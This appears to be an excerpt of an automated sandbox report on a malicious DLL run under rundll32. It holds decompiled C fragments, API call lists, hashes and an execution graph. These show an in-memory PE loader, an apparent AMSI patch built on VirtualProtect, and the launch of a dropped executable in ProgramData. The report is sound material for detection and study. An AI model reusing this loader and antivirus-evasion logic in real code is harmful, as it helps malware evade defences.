    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
    • Instruction ID: 0cda09408262def4873953c3571786d522269c13ba336bc99f64b46f3268d781
    • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
    • Instruction Fuzzy Hash: 87F10DB4A01209EFDB08CF94C994AAEB7B5FF8C304F108598E906AB345D775EE51CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01160456, Relevance: .1, Instructions: 80COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
    • Instruction ID: e0da16a10d727cb128dc24db98cdf74a47656ced7dec16e3925e45524e7ca01a
    • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
    • Instruction Fuzzy Hash: B0319136A0474A8FD724DF1CC48092AB7E8FF8D314F0A09ADFA9587312D735E9568B91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100010E0, Relevance: .0, Instructions: 9COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E100010E0(void* __ecx) {
				intOrPtr _v8;

				_v8 =  *[fs:0x30];
				return _v8;
			}




    0x100010ea
    0x100010f3

    Memory Dump Source
    • Source File: 00000003.00000002.668407668.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.668390582.0000000010000000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668432316.0000000010002000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668446107.0000000010003000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.668456462.0000000010004000.00000002.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
    • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
    • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
    • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A14A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON
    Download Yara Rule
    APIs
    • SetLastError.KERNEL32(0000007F), ref: 011A14DB
    • SetLastError.KERNEL32(0000007F), ref: 011A1507
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: e518a0573dee779e6da20ee5b463e3dc2bd7241a3e78d72a128c378984eddfda
    • Instruction ID: 25e1238ce0b13edbc828a22c36c95ab2a18f1124bbe3567ab6e5b6a3899cda11
    • Opcode Fuzzy Hash: e518a0573dee779e6da20ee5b463e3dc2bd7241a3e78d72a128c378984eddfda
    • Instruction Fuzzy Hash: 72710978E44109EFCB08DF98C580AADBBB2FF49304FA58598D416AB345D774EA81CB94
    Uniqueness

    Uniqueness Score: -1.00%

    Function 048512B0, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 55COMMON
    Download Yara Rule
    C-Code - Quality: 25%
    			E048512B0() {
				signed int _v8;
				void _v40;
				void* _v52;
				void* _v56;
				char _v124;
				int _t23;
				void* _t32;
				void* _t37;
				signed int _t40;

				_v8 =  *0x4853004 ^ _t40;
				 *0x4853028( &_v124, 0, 0x44, _t32, _t37);
				 *0x4853028( &_v56, 0, 0x10);
				_v124 = 0x44;
				memcpy( &_v40, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
				asm("movsw");
				asm("movsb");
				 *0x4853018( &_v40, 0, 0, 0, 0, 0, 0, "C:\\",  &_v124,  &_v56);
				CloseHandle(_v56);
				_t23 = CloseHandle(_v52);
				E04851A04();
				return _t23;
			}












    0x048512bd
    0x048512ca
    0x048512db
    0x048512e4
    0x048512f8
    0x048512fa
    0x048512fc
    0x0485131a
    0x04851324
    0x0485132e
    0x0485133b
    0x04851343

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID: C:\$C:\ProgramData\huqvg\huqvg.exe$C:\ProgramData\huqvg\huqvg.exe$D
    • API String ID: 2962429428-1049507935
    • Opcode ID: 84bd75b90bafa31c8a28a658541f8392a55ff0dc385e7ef02cd218c42367b373
    • Instruction ID: 544cb704eaff4a1e63d369a4b581158db99bd0ff7805c69bee5d0cbb219b1a17
    • Opcode Fuzzy Hash: 84bd75b90bafa31c8a28a658541f8392a55ff0dc385e7ef02cd218c42367b373
    • Instruction Fuzzy Hash: 5A016D71A00308ABDB10FBA4D849FDE7B7DEB48714F500958FA09A7180DA796E08CFA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A25E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56librarymemoryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryExA.KERNEL32(011A4070,00000000,00000800), ref: 011A25F9
    • GetProcAddress.KERNEL32(00000000,011A4078), ref: 011A2615
    • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 011A2650
    • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 011A2671
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual$AddressLibraryLoadProc
    • String ID: AMSI
    • API String ID: 3300690313-3828877684
    • Opcode ID: 6b93b809a0a998f89a62662b41f4dceb096ae9ce2e423d2b12969b753269a3f0
    • Instruction ID: 19ccef383f17fad157b45b6b3cb7de53d84c3863793bcfc0f5c9296d4c0127dc
    • Opcode Fuzzy Hash: 6b93b809a0a998f89a62662b41f4dceb096ae9ce2e423d2b12969b753269a3f0
    • Instruction Fuzzy Hash: 79111CB8E41209EFCB18CFD4C945BAEBBB4FB48300F504559EA1667340D7B46A44DB55
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01164466, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
    Download Yara Rule
    APIs
    • GetProcAddress.KERNEL32(?), ref: 011644DA
    • GetProcAddress.KERNEL32(?), ref: 011644E4
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: D$dll
    • API String ID: 190572456-2257804249
    • Opcode ID: d6a5440daa4b5954b40f572194cbb49577153b61c06ced8391ffe2c57ab3dd00
    • Instruction ID: 8aa7bb8960234ad2bffdced2c225c7995ecf775a5db68c4040c37f83c144f16d
    • Opcode Fuzzy Hash: d6a5440daa4b5954b40f572194cbb49577153b61c06ced8391ffe2c57ab3dd00
    • Instruction Fuzzy Hash: F8018071900218BBEB14EBA4CC99FDF7B7DEB48704F104018FB05A7185DB756A08CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B1FA0, Relevance: 6.4, APIs: 5, Instructions: 121COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E011B1FA0(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed short* _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _t82;
				void* _t124;

				_v40 = __ecx;
				_t3 = _a4 + 4; // 0x3
				_v12 =  *_t3;
				_v16 = 0;
				_v32 =  *_a4 + 0x78;
				if( *((intOrPtr*)(_v32 + 4)) != 0) {
					_v8 = _v12 +  *_v32;
					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0xffff) != 0) {
							_v24 = _v12 +  *((intOrPtr*)(_v8 + 0x20));
							_v28 = _v12 +  *((intOrPtr*)(_v8 + 0x24));
							_v36 = 0;
							_v20 = 0;
							while(_v20 <  *((intOrPtr*)(_v8 + 0x18))) {
								_t82 = E011B11E0(_a8, _v12 +  *_v24);
								_t124 = _t124 + 8;
								if(_t82 != 0) {
									_v20 = _v20 + 1;
									_v24 = _v24 + 4;
									_v28 =  &(_v28[1]);
									continue;
								}
								_v16 =  *_v28 & 0x0000ffff;
								_v36 = 1;
								break;
							}
							if(_v36 != 0) {
								L17:
								if(_v16 <=  *((intOrPtr*)(_v8 + 0x14))) {
									return _v12 +  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v8 + 0x1c)) + _v16 * 4));
								}
								SetLastError(0x7f);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v16 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L17;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}














    0x011b1fa6
    0x011b1fac
    0x011b1faf
    0x011b1fb2
    0x011b1fca
    0x011b1fd4
    0x011b1fed
    0x011b1ff7
    0x011b2004
    0x00000000
    0x011b2011
    0x011b2021
    0x011b2069
    0x011b2075
    0x011b2078
    0x011b207f
    0x011b20a3
    0x011b20bb
    0x011b20c0
    0x011b20c5
    0x011b208e
    0x011b2097
    0x011b20a0
    0x00000000
    0x011b20a0
    0x011b20cd
    0x011b20d0
    0x00000000
    0x011b20d0
    0x011b20df
    0x011b20ed
    0x011b20f6
    0x00000000
    0x011b2113
    0x011b20fa
    0x00000000
    0x011b2100
    0x011b20e3
    0x00000000
    0x011b20e9
    0x011b2035
    0x011b2058
    0x00000000
    0x011b2058
    0x011b2039
    0x00000000
    0x011b203f
    0x011b1ff7
    0x011b1fd8
    0x00000000

    APIs
    • SetLastError.KERNEL32(0000007F,?,?,?,?,011B1039,00000000), ref: 011B1FD8
    • SetLastError.KERNEL32(0000007F,?,?,?,?,011B1039,00000000), ref: 011B2004
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp Download File
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 08829c6ef4e7119b918c41de79640e5c2b5795e652099f8828019aad6a16ec33
    • Instruction ID: e74ce97e551943bb97c2aef895adb9fea17ca2de8ad985e3347358a3a91ba7b0
    • Opcode Fuzzy Hash: 08829c6ef4e7119b918c41de79640e5c2b5795e652099f8828019aad6a16ec33
    • Instruction Fuzzy Hash: 0151F974A00109DFCB18CF98C5C1BAEBBB2FF48305F208169D515AB345D735EA85CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01164266, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80threadCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 011647F6: atoi.MSVCRT ref: 011648F0
      • Part of subcall function 011647F6: _initterm.MSVCRT ref: 01164905
    • DisableThreadLibraryCalls.KERNEL32(00003A98), ref: 0116431C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID: CallsDisableLibraryThread_inittermatoi
    • String ID: EL32.dll$dll
    • API String ID: 2582834166-3514254202
    • Opcode ID: 3677c87e7301b03a0ea7938c50ba3f2ac51d1810227c807ec84151f250858ddc
    • Instruction ID: dd9d933d66306aed5d9aec51c9ff6209b572d69eaa990356ff7031291175581c
    • Opcode Fuzzy Hash: 3677c87e7301b03a0ea7938c50ba3f2ac51d1810227c807ec84151f250858ddc
    • Instruction Fuzzy Hash: 1021D872E001189BEB08DBE8CC95ADFBB7DFF44304F144028E505AB244D776AA16CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A2430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 011A2468
    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 011A24B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID: @
    • API String ID: 544645111-2766056989
    • Opcode ID: b58882c73062134d6b8c6c2542e5ba6d8bfaa6c598acfbe0382362eb876bd77e
    • Instruction ID: d6bb4cb8ae4040c6b4755268a7d96e7ab53a0ed4eb2f0232ad8187578ce22d15
    • Opcode Fuzzy Hash: b58882c73062134d6b8c6c2542e5ba6d8bfaa6c598acfbe0382362eb876bd77e
    • Instruction Fuzzy Hash: 4721E8B4A04209EFDF18CF98C980BADBFB5BF44304F648199D916AB245C774AB80DB55
    Uniqueness

    Uniqueness Score: -1.00%

    Analysis Process: rundll32.exe PID: 7132 Parent PID: 7100 rundll32.exeCOMMON

    Execution Graph

    Execution Coverage:23.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:0%
    Total number of Nodes:294
    Total number of Limit Nodes:14

    Graph

    execution_graph 2375 119157a 2376 1191688 2375->2376 2377 119169f 2376->2377 2378 1191693 SetLastError 2376->2378 2378->2377 2284 1191890 FreeLibrary 2299 1192430 2300 119243c 2299->2300 2301 1192441 VirtualProtect 2299->2301 2302 1192472 2301->2302 2302->2300 2303 11924a4 VirtualProtect 2302->2303 2303->2300 2379 1191870 GetProcAddress 2304 1151fbe 2307 115092e 2304->2307 2310 115095e 2307->2310 2309 1150959 2312 115097b 2310->2312 2311 11509a5 2311->2309 2312->2311 2313 1150d2d GetPEB 2312->2313 2313->2311 2380 11a1df6 2381 11a1f5c 2380->2381 2382 11a2120 4 API calls 2381->2382 2383 11a1f68 2382->2383 2348 11541c6 2349 11541d6 2348->2349 2350 11541d8 2348->2350 2352 1154356 2350->2352 2353 1154367 2352->2353 2356 1154266 2353->2356 2355 115445e 2355->2349 2365 11547f6 2356->2365 2358 11542a8 2359 11547f6 3 API calls 2358->2359 2360 11542e9 2359->2360 2364 1154327 2360->2364 2371 1154506 ExitProcess 2360->2371 2364->2355 2366 1154803 2365->2366 2366->2366 2367 11548a3 atoi _initterm 2366->2367 2368 115490f 2367->2368 2370 1154916 2367->2370 2368->2358 2369 1154ba0 _onexit 2369->2368 2370->2368 2370->2369 2384 11921ea 2385 11921f3 IsBadHugeReadPtr 2384->2385 2386 1192207 2385->2386 2393 11923bb 2385->2393 2387 1192239 SetLastError 2386->2387 2388 119224d 2386->2388 2386->2393 2387->2393 2389 1191a20 3 API calls 2388->2389 2390 1192267 2389->2390 2391 1192273 SetLastError 2390->2391 2394 119229d 2390->2394 2391->2393 2394->2393 2395 11923ae SetLastError 2394->2395 2395->2393 2019 1150000 2021 1150005 2019->2021 2024 115002d 2021->2024 2044 1150456 GetPEB 2024->2044 2027 1150456 GetPEB 2028 1150053 2027->2028 2029 1150456 GetPEB 2028->2029 2030 1150061 2029->2030 2031 1150456 GetPEB 2030->2031 2032 115006d 2031->2032 2033 1150456 GetPEB 2032->2033 2034 115007b 2033->2034 2035 1150456 GetPEB 2034->2035 2038 1150089 2035->2038 2036 11500e4 GetNativeSystemInfo 2037 1150107 VirtualAlloc 2036->2037 2042 1150029 2036->2042 2040 115012f 2037->2040 2038->2036 2038->2042 2039 11503b2 2046 1192690 2039->2046 2040->2039 2041 1150388 VirtualProtect 2040->2041 2041->2040 2041->2042 2045 1150045 2044->2045 2045->2027 2049 1191000 2046->2049 2052 1191030 LoadLibraryW GetProcAddress 2049->2052 2094 1191b30 2052->2094 2055 1191091 SetLastError 2089 119102b 2055->2089 2056 11910a3 2057 1191b30 SetLastError 2056->2057 2058 11910b9 2057->2058 2059 11910de SetLastError 2058->2059 2060 11910f0 2058->2060 2058->2089 2059->2089 2061 11910ff SetLastError 2060->2061 2062 1191111 2060->2062 2061->2089 2063 119111c SetLastError 2062->2063 2065 119112e GetNativeSystemInfo 2062->2065 2063->2089 2066 11911bc 2065->2066 2067 11911e9 2066->2067 2068 11911d7 SetLastError 2066->2068 2097 1191800 VirtualAlloc 2067->2097 2068->2089 2069 1191202 2070 119123d GetProcessHeap RtlAllocateHeap 2069->2070 2098 1191800 VirtualAlloc 2069->2098 2071 119127b 2070->2071 2072 1191257 SetLastError 2070->2072 2076 1191b30 SetLastError 2071->2076 2072->2089 2073 1191222 2073->2070 2074 119122e SetLastError 2073->2074 2074->2089 2077 11912fb 2076->2077 2078 1191302 2077->2078 2099 1191800 VirtualAlloc 2077->2099 2130 11916c0 2078->2130 2080 1191320 2100 1191b50 2080->2100 2082 119136b 2082->2078 2106 11921a0 2082->2106 2086 11913ca 2086->2078 2087 11913eb 2086->2087 2088 11913ff GetPEB 2087->2088 2087->2089 2125 11a1000 2088->2125 2089->2042 2095 1191b3b SetLastError 2094->2095 2096 1191070 2094->2096 2095->2096 2096->2055 2096->2056 2096->2089 2097->2069 2098->2073 2099->2080 2103 1191b7d 2100->2103 2101 1191b30 SetLastError 2102 1191c32 2101->2102 2104 1191be9 2102->2104 2138 1191800 VirtualAlloc 2102->2138 2103->2101 2103->2104 2104->2082 2107 11921dd IsBadHugeReadPtr 2106->2107 2117 11913b5 2106->2117 2109 1192207 2107->2109 2107->2117 2110 1192239 SetLastError 2109->2110 2111 119224d 2109->2111 2109->2117 2110->2117 2139 1191a20 2111->2139 2114 119229d 2114->2117 2118 11923ae SetLastError 2114->2118 2115 1192273 SetLastError 2115->2117 2117->2078 2119 1191e80 2117->2119 2118->2117 2120 1191eba 2119->2120 2121 1191fe5 2120->2121 2124 1191fc1 2120->2124 2154 1191d10 2120->2154 2122 1191d10 2 API calls 2121->2122 2122->2124 2124->2086 2162 11a1f70 2125->2162 2131 11916d2 2130->2131 2132 11916d7 2130->2132 2131->2089 2133 11919d0 VirtualFree 2132->2133 2136 119170b 2133->2136 2134 1191770 GetProcessHeap HeapFree 2134->2131 2136->2134 2137 11919d0 VirtualFree 2136->2137 2137->2134 2138->2104 2140 1191a35 2139->2140 2141 1191a2c 2139->2141 2146 1191a43 2140->2146 2147 11919f0 VirtualAlloc 2140->2147 2148 1191900 2141->2148 2144 1191a51 2144->2146 2151 11919d0 2144->2151 2146->2114 2146->2115 2147->2144 2149 119190c 2148->2149 2150 1191910 VirtualQuery 2148->2150 2149->2140 2150->2149 2152 11919d9 VirtualFree 2151->2152 2153 11919ea 2151->2153 2152->2153 2153->2146 2155 1191d29 2154->2155 2159 1191d1f 2154->2159 2156 1191d37 2155->2156 2157 1191d9d VirtualProtect 2155->2157 2156->2159 2161 1191820 VirtualFree 2156->2161 2157->2159 2159->2120 2161->2159 2177 11a1b50 2162->2177 2165 11a1fa0 2166 11a1fd6 SetLastError 2165->2166 2167 11a1fe5 2165->2167 2168 11a1039 2166->2168 2169 11a2002 SetLastError 2167->2169 2170 11a2011 2167->2170 2168->2089 2169->2168 2171 11a2023 2170->2171 2174 11a2060 2170->2174 2172 11a2046 2171->2172 2173 11a2037 SetLastError 2171->2173 2172->2168 2176 11a20f8 SetLastError 2172->2176 2173->2168 2174->2172 2175 11a20e1 SetLastError 2174->2175 2175->2168 2176->2168 2214 11a1270 2177->2214 2180 11a1025 2180->2165 2181 11a1b93 SetLastError 2181->2180 2182 11a1ba5 2183 11a1270 SetLastError 2182->2183 2184 11a1bbe 2183->2184 2184->2180 2185 11a1bf2 2184->2185 2186 11a1be0 SetLastError 2184->2186 2187 11a1c13 2185->2187 2188 11a1c01 SetLastError 2185->2188 2186->2180 2189 11a1c1e SetLastError 2187->2189 2191 11a1c30 GetNativeSystemInfo 2187->2191 2188->2180 2189->2180 2192 11a1cf6 VirtualAlloc 2191->2192 2193 11a1ce4 SetLastError 2191->2193 2194 11a1d42 GetProcessHeap HeapAlloc 2192->2194 2195 11a1d17 VirtualAlloc 2192->2195 2193->2180 2197 11a1d7c 2194->2197 2198 11a1d5c VirtualFree SetLastError 2194->2198 2195->2194 2196 11a1d33 SetLastError 2195->2196 2196->2180 2199 11a1270 SetLastError 2197->2199 2198->2180 2200 11a1ded 2199->2200 2201 11a1dfb VirtualAlloc 2200->2201 2211 11a1df1 2200->2211 2202 11a1e2a 2201->2202 2217 11a12a0 2202->2217 2205 11a1e5e 2205->2211 2227 11a18c0 2205->2227 2209 11a1ec7 2209->2211 2248 3371010 2209->2248 2211->2180 2252 11a2120 2211->2252 2212 11a1f1f SetLastError 2212->2211 2215 11a127f SetLastError 2214->2215 2216 11a128b 2214->2216 2215->2216 2216->2180 2216->2181 2216->2182 2218 11a12d0 2217->2218 2219 11a1363 2218->2219 2220 11a1380 2218->2220 2221 11a130c VirtualAlloc 2218->2221 2222 11a1270 SetLastError 2219->2222 2220->2205 2224 11a1330 2221->2224 2225 11a1337 2221->2225 2223 11a137c 2222->2223 2223->2220 2226 11a1384 VirtualAlloc 2223->2226 2224->2220 2225->2218 2226->2220 2228 11a1900 IsBadReadPtr 2227->2228 2238 11a18f6 2227->2238 2230 11a192a 2228->2230 2228->2238 2230->2238 2259 11a1af0 LoadLibraryA 2230->2259 2232 11a195c SetLastError 2232->2238 2233 11a1970 2261 11a1170 2233->2261 2236 11a1996 SetLastError 2236->2238 2238->2211 2242 11a15b0 2238->2242 2239 11a19c0 2239->2238 2240 11a1ad1 SetLastError 2239->2240 2240->2238 2246 11a15f8 2242->2246 2243 11a1701 2244 11a1460 2 API calls 2243->2244 2247 11a16dd 2244->2247 2246->2243 2246->2247 2269 11a1460 2246->2269 2247->2209 2249 3371022 2248->2249 2250 11a1f16 2248->2250 2276 33711a0 13 API calls 2249->2276 2250->2211 2250->2212 2253 11a213a 2252->2253 2254 11a2135 2252->2254 2258 11a21c4 2253->2258 2281 11a1120 2253->2281 2254->2180 2255 11a21d0 VirtualFree 2256 11a21e4 GetProcessHeap HeapFree 2255->2256 2256->2254 2258->2255 2258->2256 2260 11a1950 2259->2260 2260->2232 2260->2233 2262 11a117c 2261->2262 2265 11a1185 2261->2265 2263 11a1050 VirtualQuery 2262->2263 2263->2265 2264 11a1140 VirtualAlloc 2266 11a11a1 2264->2266 2265->2264 2268 11a1193 2265->2268 2267 11a1120 VirtualFree 2266->2267 2266->2268 2267->2268 2268->2236 2268->2239 2270 11a147c 2269->2270 2271 11a1472 2269->2271 2272 11a148a 2270->2272 2274 11a14e4 VirtualProtect 2270->2274 2271->2246 2272->2271 2273 11a14c2 VirtualFree 2272->2273 2273->2271 2274->2271 2277 3371040 6 API calls 2276->2277 2278 33712a3 2277->2278 2279 33710b0 21 API calls 2278->2279 2280 33712a8 2279->2280 2280->2250 2282 11a113a 2281->2282 2283 11a1129 VirtualFree 2281->2283 2282->2258 2283->2282 2285 11a190d 2286 11a1916 IsBadReadPtr 2285->2286 2287 11a192a 2286->2287 2288 11a1ade 2286->2288 2287->2288 2298 11a1af0 LoadLibraryA 2287->2298 2289 11a1950 2290 11a195c SetLastError 2289->2290 2291 11a1970 2289->2291 2290->2288 2292 11a1170 3 API calls 2291->2292 2293 11a198a 2292->2293 2294 11a1996 SetLastError 2293->2294 2296 11a19c0 2293->2296 2294->2288 2296->2288 2297 11a1ad1 SetLastError 2296->2297 2297->2288 2298->2289 2322 11914a0 2323 11914d9 SetLastError 2322->2323 2324 11914e8 2322->2324 2325 119169f 2323->2325 2326 1191505 SetLastError 2324->2326 2327 1191514 2324->2327 2326->2325 2328 1191562 2327->2328 2329 1191527 2327->2329 2332 119156b SetLastError 2328->2332 2333 119157f 2328->2333 2330 1191549 2329->2330 2331 119153a SetLastError 2329->2331 2330->2325 2337 1191693 SetLastError 2330->2337 2331->2325 2332->2325 2334 1191648 bsearch 2333->2334 2341 11919f0 VirtualAlloc 2333->2341 2334->2330 2336 1191672 SetLastError 2334->2336 2336->2325 2337->2325 2338 11915b3 2339 11915c8 SetLastError 2338->2339 2340 11915d7 2338->2340 2339->2325 2340->2334 2341->2338 2372 1191840 LoadLibraryA 2373 1191857 2372->2373 2396 11925e0 LoadLibraryExA 2397 1192608 2396->2397 2398 119260c GetProcAddress 2396->2398 2399 1192627 VirtualProtect VirtualProtect 2398->2399 2399->2397 2343 1154528 LoadLibraryW GetProcAddress

    Executed Functions

    Function 01191030, Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 115 1191030-1191075 LoadLibraryW GetProcAddress call 1191b30 118 119107e-119108f 115->118 119 1191077-1191079 115->119 121 1191091-119109e SetLastError 118->121 122 11910a3-11910be call 1191b30 118->122 120 119148d-1191490 119->120 121->120 125 11910c0-11910c2 122->125 126 11910c7-11910dc 122->126 125->120 127 11910de-11910eb SetLastError 126->127 128 11910f0-11910fd 126->128 127->120 129 11910ff-119110c SetLastError 128->129 130 1191111-119111a 128->130 129->120 131 119111c-1191129 SetLastError 130->131 132 119112e-119114f 130->132 131->120 133 1191163-119116d 132->133 134 119116f-1191176 133->134 135 11911a5-11911d5 GetNativeSystemInfo call 11918d0 * 2 133->135 136 1191178-1191184 134->136 137 1191186-1191192 134->137 146 11911e9-119120c call 1191800 135->146 147 11911d7-11911e4 SetLastError 135->147 139 1191195-119119b 136->139 137->139 141 119119d-11911a0 139->141 142 11911a3 139->142 141->142 142->133 149 119123d-1191255 GetProcessHeap RtlAllocateHeap 146->149 150 119120e-119121f call 1191800 146->150 147->120 151 119127b-1191291 149->151 152 1191257-1191276 SetLastError 149->152 153 1191222-119122c 150->153 154 119129c 151->154 155 1191293-119129a 151->155 152->120 153->149 156 119122e-1191238 SetLastError 153->156 158 11912a3-1191300 call 1191b30 154->158 155->158 156->120 161 1191302 158->161 162 1191307-1191370 call 1191800 call 1191980 call 1191b50 158->162 163 119147f-119148b call 11916c0 161->163 171 1191372 162->171 172 1191377-1191388 162->172 163->120 171->163 173 119138a-11913a0 call 1192090 172->173 174 11913a2-11913a5 172->174 176 11913ac-11913ba call 11921a0 173->176 174->176 180 11913bc 176->180 181 11913c1-11913cf call 1191e80 176->181 180->163 184 11913d1 181->184 185 11913d6-11913e4 call 1192010 181->185 184->163 188 11913eb-11913f4 185->188 189 11913e6 185->189 190 1191470-1191473 188->190 191 11913f6-11913fd 188->191 189->163 194 119147a-119147d 190->194 192 119145d-119146b 191->192 193 11913ff-119144e GetPEB call 11a1000 191->193 195 119146e 192->195 196 1191451-119145b 193->196 194->120 195->194 196->195
    APIs
    • LoadLibraryW.KERNEL32(01194054,01194040), ref: 01191047
    • GetProcAddress.KERNEL32(00000000), ref: 0119104E
      • Part of subcall function 01191B30: SetLastError.KERNEL32(0000000D,?,01191070,?,00000040), ref: 01191B3D
    • SetLastError.KERNEL32(000000C1), ref: 01191096
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$AddressLibraryLoadProc
    • String ID:
    • API String ID: 1866314245-0
    • Opcode ID: f5daf84b8892bb4d22cc349553edafac20890d228188a8bfa3a5b07b2c1bbd5a
    • Instruction ID: 062b3991f2beb898535cca05ba1c4f6bcbda3103100f6f9602e434ac9d990f30
    • Opcode Fuzzy Hash: f5daf84b8892bb4d22cc349553edafac20890d228188a8bfa3a5b07b2c1bbd5a
    • Instruction Fuzzy Hash: 09F1DCB4E01209EFDF08DF94D984AADB7B1BF48314F148598E925AB341D735EE81CB51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 033711A0, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 69libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 100%
    			E033711A0() {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
